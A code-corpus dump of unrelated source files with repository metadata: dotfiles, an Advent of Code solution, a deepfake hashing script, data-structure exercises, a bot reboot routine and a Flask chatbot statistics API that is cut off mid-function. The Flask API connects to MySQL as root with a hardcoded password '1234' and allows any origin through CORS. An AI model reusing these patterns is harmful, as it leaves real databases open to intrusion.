b1d93ea2d6cbc76b83a04f1dfc360dfdaf7bddcd | eb380d17c209c77adcb78240b6a03f64f3166d03 | /binfiles/dirs.py | 4074772dd54f6722c154d623a496a4db604662c7 | [] | no_license | abatkin/dotfiles | 2cee24e7b97d56d6cc15747ab4fff4f5a0743aa5 | 48ae654527c666013dd9b5f8a4c0e88335c0db43 | refs/heads/master | 2023-07-06T05:52:37.580612 | 2023-07-04T20:33:28 | 2023-07-04T20:33:28 | 8,023,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,568 | py | #!/usr/bin/env python3
import sys
import subprocess
import configparser
import argparse
import os
SPECIAL_SECTIONS = ["app_config", "DEFAULT"]
SECTION_TYPES = {}
def launch(launch_string, arg):
args = launch_string.split(" ")
def convert_arg(item):
if item == "$":
item = arg
return os.path.expanduser(item)
args = [convert_arg(item) for item in args]
subprocess.Popen(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL, close_fds=True)
def open_folder(config, item):
launch(config["folder_launcher"], item["path"])
def section_type(f):
section_name = f.__name__
SECTION_TYPES[section_name] = f
return f
@section_type
def folder(config, section_name, section):
return {
"path": section["path"],
"launch": lambda path: open_folder(config, path),
"icon": section.get("icon", "folder"),
}
def get_cli_args():
parser = argparse.ArgumentParser(prog="dirs.py", description="Get extra launcher entries for rofi")
parser.add_argument("--config", default="~/.config/launch-entries.ini", help="Configuration file")
parser.add_argument("command_key", nargs="?", help="Key of command to run")
return parser.parse_args()
def get_config_file(cli_args):
config_path = os.path.expanduser(cli_args.config)
parser = configparser.ConfigParser()
parser.read(config_path)
return parser
def section_to_item(config, section_name, section):
section_type = section.get("type")
if not section_type:
print(f"missing 'type' in {section_name}")
sys.exit(1)
section_constructor = SECTION_TYPES[section_type]
return section_constructor(config, section_name, section)
def get_entries(config_file):
config_section = config_file["app_config"]
return {section_name: section_to_item(config_section, section_name, section) for section_name, section in config_file.items() if section_name not in SPECIAL_SECTIONS}
def main():
cli_args = get_cli_args()
config_file = get_config_file(cli_args)
entries = get_entries(config_file)
command_key = cli_args.command_key
if command_key:
if command_key not in entries:
print(f"Unable to find find command with key {command_key}")
sys.exit(1)
item = entries[command_key]
item["launch"](item)
else:
for k, v in entries.items():
if "icon" in v:
print(f"{k}\0icon\x1f{v['icon']}\n")
else:
print(f"{k}\n")
main()
| [
"adam@batkin.net"
] | adam@batkin.net |
8d171a5022415dbcc2597a1fcc88f810666aa159 | 227b4e6af73f56f7d17b79f9351b7b10b7b3c842 | /17/17-1-3.py | eefb39346e30e62a6379d1f4ac78e51939476103 | [] | no_license | phootip/advent-of-code-2018 | 32782e8525475efa2cc93c21e9c93d746483a71d | a335f2b333bb01caef6822592c051e3f13686d5d | refs/heads/master | 2022-12-10T15:01:50.349531 | 2018-12-28T17:26:30 | 2018-12-28T17:26:30 | 161,011,308 | 0 | 0 | null | 2022-12-08T01:38:12 | 2018-12-09T06:25:29 | Python | UTF-8 | Python | false | false | 2,813 | py | from PIL import Image, ImageDraw
# f = open('./17/17.txt')
f = open('./17.txt')
# f = open('17-test.txt')
nodes = [(500,0)]
revisit = []
maps = [['.' for i in range(2000)] for j in range(2000)]
for line in f:
line = line.strip().split(',')
line = list(map(lambda x: x.strip().split('='),line))
line[1][1] = list(map(int,line[1][1].split('..')))
line[0][1] = int(line[0][1])
p1 = line[0][1]
p21 = line[1][1][0]
p22 = line[1][1][1]
if line[0][0] == 'x':
for i in range(p21,p22+1):
maps[i][p1] = '#'
else:
for i in range(p21,p22+1):
maps[p1][i] = '#'
maps[0][500] = '|'
minX, maxX = 2100,0
minY, maxY = 2100,0
for y in range(2000):
for x in range(2000):
if maps[y][x] != '.':
minX = min(minX,x)
maxX = max(maxX,x)
minY = min(minY,y)
maxY = max(maxY,y)
def draw():
ans = 0
im = Image.new('RGB', (2000, 2000), color = 'white')
draw = ImageDraw.Draw(im)
for y in range(minY+1,maxY+1):
for x in range(minX-1,maxX+2):
# print(maps[y][x],end='')
if(maps[y][x] == '|'):
draw.rectangle([(x,y),(x,y)],fill='green')
ans += 1
elif(maps[y][x] == '#'):
draw.rectangle([(x,y),(x,y)],fill='brown')
ans += 0
elif(maps[y][x] == '~'):
draw.rectangle([(x,y),(x,y)],fill='blue')
ans += 1
# print()
# im = im.crop((450,0,550,100))
# im = im.resize((500,500))
im.save(f"./visual/ans.png")
return ans
def deadEnd(x,y,d):
if(maps[y][x] == '|' and (maps[y+1][x] == '#' or maps[y+1][x] == '~')):
return deadEnd(x+d,y,d)
if(maps[y][x] == '#'):
return True
elif(maps[y][x] == '.'):
maps[y][x] = '|'
if(maps[y+1][x] == '#' or maps[y+1][x] == '~'):
return deadEnd(x+d,y,d)
elif(maps[y+1][x] == '.'):
nodes.append((x,y+1))
revisit.append((x,y))
maps[y+1][x] = '|'
return False
return False
def still(x,y,d):
while(maps[y][x] == '|'):
maps[y][x] = '~'
if(maps[y-1][x] == '|'):
nodes.append((x,y-1))
x += d
def check(x,y,d):
if(maps[y][x] == '|'):
return check(x+d,y,d)
if(maps[y][x] == '.'):
return False
if(maps[y][x] == '#'):
return True
def cycle():
while nodes:
x,y = nodes.pop(0)
if(y > maxY):
continue
if(maps[y+1][x] == '.'):
nodes.append((x,y+1))
maps[y+1][x] = '|'
elif(maps[y+1][x] == '#' or maps[y+1][x] == '~'):
right = deadEnd(x+1,y,1)
left = deadEnd(x-1,y,-1)
if right and left:
still(x,y,1)
still(x-1,y,-1)
return True
while nodes:
temp = revisit[:]
cycle()
for x,y in revisit:
right = check(x+1,y,1)
left = check(x-1,y,-1)
if( right and left ):
still(x,y,1)
still(x-1,y,-1)
ans = draw()
print(minX,minY)
print(maxX,maxY)
print(ans)
# print(ans - 1) | [
"phootip.t@gmail.com"
] | phootip.t@gmail.com |
0352eb84ce1933e896691dcfd8d602529a7c6ac8 | 6e66abb51d4d4bbf3c335e19530d439c2615ff4e | /deepfake/deepfake/skp/etl/compute_image_hashes.py | 8442a845e134be8e0c3d046f7232de52cda984f1 | [] | no_license | yihhan/3dcnn_code | 19ed5aafe62e7e53c259dedd724b9e970940a870 | 3483e2840c68e69a90304dc4922657e0e9a590d8 | refs/heads/main | 2023-07-31T04:37:00.616853 | 2021-09-20T03:21:07 | 2021-09-20T03:21:07 | 408,280,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | import pandas as pd
import numpy as np
import decord
import imagehash
import glob, os, os.path as osp
from tqdm import tqdm
from PIL import Image
def load_video(filename, max_frames=100):
vr = decord.VideoReader(filename, ctx=decord.cpu())
return np.asarray([vr[i].asnumpy() for i in range(max_frames)])
def compute_hashes(x, y):
hash_funcs = [imagehash.average_hash, imagehash.phash, imagehash.dhash, imagehash.whash]
x = Image.fromarray(x.astype('uint8'))
y = Image.fromarray(y.astype('uint8'))
hash_differences = []
for hfunc in hash_funcs:
hash_differences.append(hfunc(x)-hfunc(y))
return hash_differences
VIDEODIR = '/home/ianpan/ufrc/deepfake/data/dfdc/videos/'
videos = glob.glob(osp.join(VIDEODIR, '*/*.mp4'))
df = pd.read_csv('/home/ianpan/ufrc/deepfake/data/dfdc/train.csv')
df = df[df['label'] == 'FAKE']
hash_diffs = {}
for orig, _df in tqdm(df.groupby('original'), total=len(df['original'].unique())):
orig_filepath = _df['filepath'].iloc[0].replace(_df['filename'].iloc[0], orig)
orig_video = load_video(osp.join(VIDEODIR, orig_filepath))
for fake_rownum, fake_row in _df.iterrows():
fake_video = load_video(osp.join(VIDEODIR, fake_row['filepath']))
hash_diffs[fake_row['filename']] = []
for real_frame, fake_frame in zip(orig_video, fake_video):
hash_diffs[fake_row['filename']].append(compute_hashes(real_frame, fake_frame))
| [
"tanyihhan@gmail.com"
] | tanyihhan@gmail.com |
6700c063471e30cfe487dee40901fad3323c7060 | 404ad77945e7ff8a57dac8753b00cb7187bd7f4e | /105/001.py | dce8d85ee6ea0834af75a97b3fa8fd5befcc6430 | [] | no_license | dennisliuu/Coding-365 | 5d773493fbf69bce03de20e4a03c5fdf108612f6 | 8e1cab65837ebe2cb36fa0e4b74fb07d0ee6b081 | refs/heads/master | 2020-03-24T22:33:58.299791 | 2018-08-07T05:06:21 | 2018-08-07T05:06:21 | 143,091,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,241 | py | class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items) - 1]
def size(self):
return len(self.items)
class CircularQueue:
# Constructor
def __init__(self):
self.queue = list()
self.head = 0
self.tail = 0
self.maxSize = 5
# Adding elements to the queue
def enqueue(self, data):
self.queue.append(data)
self.tail = (self.tail + 1) % self.maxSize
# Removing elements from the queue
def dequeue(self):
data = self.queue[self.head]
self.head = (self.head + 1) % self.maxSize
return data
# Calculating the size of the queue
def size(self):
if self.tail >= self.head:
return (self.tail - self.head)
return (self.maxSize - (self.head - self.tail))
lst = []
s = Stack()
Select = input()
if Select == '1':
s = Stack()
while 1:
mov = input().split(' ')
if mov[0] == '1':
if s.size() > 4:
print("FULL")
break
else:
s.push(int(mov[1]))
elif mov[0] == '2':
if s.size() == 0:
print("EMPTY")
break
else:
print(s.pop(), s.size())
elif mov[0] == '3':
while s.isEmpty() is False:
# print(s.pop())
lst.append(s.pop())
lst = reversed(lst)
print(*lst)
break
elif Select == '2':
q = CircularQueue()
while 1:
mov = input().split(' ')
if mov[0] == '1':
if q.size() < 4:
q.enqueue(int(mov[1]))
else:
print("FULL")
break
elif mov[0] == '2':
if q.size() > 0:
q.dequeue()
else:
print("EMPTY")
break
elif mov[0] == '3':
while q.size() != 0:
lst.append(q.dequeue())
print(*lst)
break | [
"dennisliuu@gmail.com"
] | dennisliuu@gmail.com |
0ac0305052893eb0942f039d2bc543f72d5454e5 | cf09d6430e37b5460d7208d6cae6d3af0fa15925 | /jsonbot/jsb/lib/reboot.py | 9209bd73573898a076abeb23cc8bd8fa26b3fd6a | [
"MIT"
] | permissive | Lujeni/old-projects | 2bbf0ff89852a3e4a9677475a615d2ee4b07d635 | 657304c8b017a98935de9728fc695abe8be7cc4f | refs/heads/master | 2021-03-12T23:08:34.054777 | 2014-10-16T23:10:15 | 2014-10-16T23:10:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,632 | py | # jsb/reboot.py
#
#
""" reboot code. """
## jsb imports
from jsb.lib.fleet import getfleet
from jsb.imports import getjson
json = getjson()
## basic imports
import os
import sys
import pickle
import tempfile
import logging
import time
## reboot function
def reboot():
""" reboot the bot. """
logging.warn("reboot - rebooting")
os.execl(sys.argv[0], *sys.argv)
## reboot_stateful function
def reboot_stateful(bot, ievent, fleet, partyline):
""" reboot the bot, but keep the connections (IRC only). """
logging.warn("reboot - doing statefull reboot")
session = {'bots': {}, 'name': bot.cfg.name, 'channel': ievent.channel, 'partyline': []}
fleet = getfleet()
for i in fleet.bots:
logging.warn("reboot - updating %s" % i.cfg.name)
data = i._resumedata()
if not data: continue
session['bots'].update(data)
if i.type == "sxmpp": i.exit() ; continue
if i.type == "convore": i.exit() ; continue
if i.type == "tornado":
i.exit()
time.sleep(0.1)
for socketlist in i.websockets.values():
for sock in socketlist: sock.stream.close()
session['partyline'] = partyline._resumedata()
sfile, sessionfile = tempfile.mkstemp('-session', 'jsb-', text=True)
logging.warn("writing session file %s" % sessionfile)
json.dump(session, open(sessionfile, "w"))
args = []
skip = False
for a in sys.argv[1:]:
if skip: skip = False ; continue
if a == "-r": skip = True ; continue
args.append(a)
os.execl(sys.argv[0], sys.argv[0], '-r', sessionfile, *args)
| [
"julien@thebault.co"
] | julien@thebault.co |
318d59a2c7fd3d07c465da350c7d3b65dd8f4934 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /ivs_write_f/playback-key-pair_import.py | e6227c4b54f4786793a1d735b01d2cf516e72ad9 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-playback-key-pair : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/delete-playback-key-pair.html
get-playback-key-pair : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/get-playback-key-pair.html
list-playback-key-pairs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ivs/list-playback-key-pairs.html
"""
write_parameter("ivs", "import-playback-key-pair") | [
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
a4b3840315ea96ca28729257ee1a111f26226833 | 87d87c3c621c7f49cb1e7a5a4405aed4ee333857 | /.venv/bin/pip3.6 | 3c859a8ef91b0e61ab44a7c932c77a6958f7b3c6 | [] | no_license | victor-s-santos/Workshopgenetica | 32296f4b04216013562720688b14eb7fdb2877eb | 79233821b8919a564e37e0b6961c4e64b65797e8 | refs/heads/master | 2021-06-20T14:58:58.110529 | 2019-06-19T19:31:48 | 2019-06-19T19:31:48 | 192,790,662 | 0 | 0 | null | 2021-06-10T21:36:24 | 2019-06-19T19:17:23 | Python | UTF-8 | Python | false | false | 237 | 6 | #!/home/victor/Django/unesp_apps/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"victorsantos.py@gmail.com"
] | victorsantos.py@gmail.com |
3e4e5435d302503d3bc1b51a2fe2084deea94028 | ca4d1f815784ce137c27b2ddfe6515ca0cf7b5b5 | /python/IKnow/iknowFlask.py | c96850eb52cc67debe8c2dad0ceed73310f6f785 | [] | no_license | jacobL/iknow | 152a2d905c0178cbd7d907c2a0d4546ede3c6abb | 135000f94cac4dc450006eddc94415edd0ac3a6e | refs/heads/main | 2023-05-30T16:56:31.668948 | 2021-06-25T07:43:49 | 2021-06-25T07:43:49 | 380,092,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108,885 | py | from flask import Flask
from flask import jsonify
from flask import request
from flask_cors import CORS, cross_origin
from collections import OrderedDict
from werkzeug.serving import run_simple
import pymysql
import pyodbc
import datetime
import time
import json
app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = True
CORS(app)
@app.route("/toplist1", methods=['GET'])
def toplist1():
PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from mq_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from qs_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from qmd_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from rma_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from sqe_chat_log_new) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo group by answerNo ) a,(select count(1) total from iknow.chatLog) b order by c desc limit %s",(TopN))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist2", methods=['GET'])
def toplist2():
PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
print(PERNR,' ',deptSystem)
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from mq_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from qs_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from qmd_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from rma_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from sqe_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from iknow.chatLog where PERNR=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist3", methods=['GET'])
def toplist3():
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from mq_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qs_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qmd_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from rma_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from sqe_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description, count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where feedback=0 and s.answerNo is not NULL group by s.answerNo ) a,(select count(1) total from iknow.chatLog where feedback=0 and answerNo is not NULL) b limit 5" )
#cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from qm.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from qm.chatLog where PERNR=%s) b limit 5",(PERNR,PERNR))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist4", methods=['GET'])
def toplist4():
#PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from mq_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qs_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qmd_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from rma_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from sqe_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description, count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where feedback<>0 and s.answerNo is not NULL group by s.answerNo ) a,(select count(1) total from iknow.chatLog where feedback<>0 and answerNo is not NULL) b limit 5" )
#cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from qm.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from qm.chatLog where PERNR=%s) b limit 5",(PERNR,PERNR))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/feedback", methods=['GET'])
def feedback():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
Chat_ID = request.args.get('Chat_ID');
result = request.args.get('result');
feedbackText = request.args.get('comment');
#print('Chat_ID:',Chat_ID,' result:',result,' feedbackText:',feedbackText)
returnData = OrderedDict();
if feedbackText != '':
cur.execute("update iknow.chatLog set feedback=%s,feedbackText=%s where id=%s",(result,feedbackText,Chat_ID))
else :
cur.execute("update iknow.chatLog set feedback=%s where id=%s",(result,Chat_ID))
cur.execute("COMMIT")
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/leadUpdate", methods=['GET'])
def leadUpdate():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = request.args.get('yearmonth');
lead1 = request.args.get('lead1');
lead2 = request.args.get('lead2');
lead3 = request.args.get('lead3');
Chat_ID = request.args.get('Chat_ID');
print(app,' ',yearmonth,' ',lead1,' ',lead2,' ',lead3,' ',Chat_ID)
cur.execute("update iknow.chatLog set app=%s,yearmonth=%s,answerType=1,lead1=%s,lead2=%s,lead3=%s where id=%s",(app,yearmonth,lead1,lead2,lead3,Chat_ID))
cur.execute("COMMIT")
returnData = OrderedDict();
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 查詢談話紀錄
@app.route("/getChatLog", methods=['GET'])
def getChatLog():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
returnData = OrderedDict();
cur.execute("select id,PERNR,chat,checktime,status,sessionsId,answerType,app,yearmonth,answerNo,feedback,feedbackText,lead1,lead2,lead3,answerText,userChineseName from iknow.chatLog order by id desc")
c = 0
for r in cur :
tmp = OrderedDict()
tmp['id'] = r[0]
tmp['PERNR'] = r[1]
tmp['chat'] = r[2]
tmp['checktime'] = r[3]
tmp['status'] = r[4]
tmp['sessionsId'] = r[5]
tmp['answerType'] = r[6]
tmp['app'] = r[7]
tmp['yearmonth'] = r[8]
tmp['answerNo'] = r[9]
tmp['feedback'] = r[10]
tmp['feedbackText'] = r[11]
tmp['lead1'] = r[12]
tmp['lead2'] = r[13]
tmp['lead3'] = r[14]
tmp['answerText'] = r[15]
